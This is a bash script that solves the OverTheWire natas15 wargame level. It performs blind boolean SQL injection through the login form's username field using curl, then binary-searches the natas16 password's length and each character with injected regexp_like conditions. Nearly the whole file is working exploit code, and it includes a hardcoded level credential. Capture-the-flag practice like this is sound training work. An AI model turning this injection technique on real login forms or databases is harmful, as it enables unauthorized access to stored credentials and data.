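#!/usr/bin/env bash
#
# Blind SQL injection oracle for OverTheWire natas15 -> natas16.
#
# natas15's login form only reveals whether a username exists, so the natas16
# password is recovered one character at a time: every query injects a boolean
# condition after `username="natas16" and` and reads the "exists" answer back.
# The length is found by binary search over length(password); each character
# is then found by binary search over a character class using a case-sensitive
# regexp_like().
#
# Usage: ./natas15.sh            (prints the recovered password on stdout,
#                                 progress on stderr)
# Env:   NATAS15_PASS  natas15 password; defaults to the well-known level
#                      password. curl -u puts it on the command line, so it is
#                      visible in `ps` and shell history -- acceptable for a
#                      public wargame credential, not for anything real.
set -euo pipefail

readonly TARGET="http://natas15.natas.labs.overthewire.org/index.php"
readonly NATAS15_USER="natas15"
NATAS15_PASS="${NATAS15_PASS:-SdqIqBsFcz3yotlNYErZSZwblkm0lrvx}"
readonly NATAS15_PASS

readonly LOWER="abcdefghijklmnopqrstuvwxyz"
readonly UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
readonly DIGIT="0123456789"

die() { printf '%s\n' "$*" >&2; exit 1; }

#######################################
# Ask the oracle whether a SQL condition holds for the natas16 row.
# Arguments: $1 - SQL boolean expression, injected after `username="natas16" and`
# Returns:   0 if the page contains "exists", 1 otherwise.
#            Exits the script if the HTTP request itself fails, so a network
#            or auth error is never silently read as a "false" answer (the
#            original piped curl straight into grep and could not tell them
#            apart, which corrupts a binary search).
#######################################
req() {
  local body
  # --data-urlencode keeps regex metacharacters (^ $ [ ] ' ( ) ,) and the
  # trailing space after the `-- ` comment intact in the form body.
  # -f makes HTTP >= 400 a curl failure; assumes the oracle answers both
  # outcomes with a 2xx page -- TODO confirm against the live target.
  body=$(curl -sS -f \
      -X POST \
      -u "${NATAS15_USER}:${NATAS15_PASS}" \
      --data-urlencode "username=natas16\" and $1 -- " \
      "$TARGET") || die "[!] request failed for condition: $1"
  grep -q exists <<<"$body"
}

#######################################
# Oracle query on the password length.
# Arguments: $1 - comparison suffix, e.g. "=32" or ">32"
# Returns:   req's status for `length(password)$1`
#######################################
guess_length() {
  req "length(password)$1"
}

#######################################
# Binary-search the password length.
# Arguments: $1 - exclusive lower bound (default 1): length is assumed > $1
#            $2 - inclusive upper bound (default 100): length is assumed <= $2
# Outputs:   progress on stderr; the length as a decimal number on stdout.
#            (The original returned it as the exit status, which wraps at
#            256 and cannot be captured with $(...).)
# Returns:   0 on success; exits if the bounds are inconsistent or the oracle
#            does not confirm the final answer with an exact-equality query.
#######################################
get_length() {
  local lo=${1:-1}
  local hi=${2:-100}
  local mid

  (( hi - lo >= 1 )) || die "[!] get_length: need lower < upper (got $lo, $hi)"

  echo "[*] Guessing length" >&2
  # Invariant: lo < length <= hi.
  while (( hi - lo > 1 )); do
    printf '[-] Guess: %*s - %-*s\r' "${#hi}" "$lo" "${#hi}" "$hi" >&2
    mid=$(( (hi + lo) / 2 ))
    if guess_length ">$mid"; then
      lo=$mid
    else
      hi=$mid
    fi
  done
  printf '[+] Found: %*s - %-*s\n' "${#hi}" "$lo" "${#hi}" "$hi" >&2

  # A true length outside (lo, hi] would silently converge on a wrong bound,
  # so spend one extra query confirming the answer before trusting it.
  guess_length "=$hi" || die "[!] length $hi not confirmed by the oracle; widen the bounds"
  printf '%s\n' "$hi"
}

#######################################
# Oracle query: does the password match ^<$1>[a-zA-Z0-9]*$ (case-sensitive)?
# Arguments: $1 - regex fragment: the known prefix plus the next character or
#                 character range, e.g. "abc[a-m]"
# Returns:   req's status for the regexp_like() condition
#######################################
guess_regex() {
  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
}

#######################################
# Recover the password character by character.
# Globals:   LOWER, UPPER, DIGIT (read)
# Arguments: $1 - password length, as printed by get_length
# Outputs:   progress on stderr; the recovered password on stdout
# Returns:   0 on success; exits if a position matches none of the three
#            character classes (the original looped forever in that case)
#######################################
exploit_oracle() {
  local length=$1
  local prefix=""
  local chars lo hi mid range found

  echo "[@] Forcing oracle exploit" >&2
  while (( ${#prefix} < length )); do
    found=0
    for chars in "$LOWER" "$UPPER" "$DIGIT"; do
      lo=1
      hi=${#chars}
      range="[${chars:lo-1:1}-${chars:hi-1:1}]"
      printf '[*] ?? %s\r' "$range" >&2
      # One query rules the whole class in or out before bisecting it.
      guess_regex "$prefix$range" || continue
      found=1
      echo "[+] Found[CHARSET]: $chars" >&2

      # Invariant: the next character is in chars[lo-1 .. hi-1] (1-based,
      # inclusive). On a miss, lo=mid rather than mid+1 keeps the invariant
      # trivially true at the cost of at most one extra query.
      while (( hi - lo > 1 )); do
        mid=$(( (hi + lo) / 2 ))
        range="[${chars:lo-1:1}-${chars:mid-1:1}]"
        printf '[*] Guess: %s\r' "$range" >&2
        if guess_regex "$prefix$range"; then
          hi=$mid
        else
          lo=$mid
        fi
      done
      # Two candidates left: test lo, otherwise it must be hi.
      if guess_regex "$prefix${chars:lo-1:1}"; then
        prefix="${prefix}${chars:lo-1:1}"
      else
        prefix="${prefix}${chars:hi-1:1}"
      fi
      echo "[+] Update: ${prefix: -1} -> $prefix" >&2
      break
    done
    (( found )) || die "[!] no alphanumeric character matched at position $(( ${#prefix} + 1 ))"
  done

  printf '[+] Found: %s\n' "$prefix" >&2
  printf '%s\n' "$prefix"
}

main() {
  local length
  # Assign on its own line so a die inside get_length aborts under set -e
  # instead of feeding an empty length to exploit_oracle.
  length=$(get_length)
  exploit_oracle "$length"
}

main "$@"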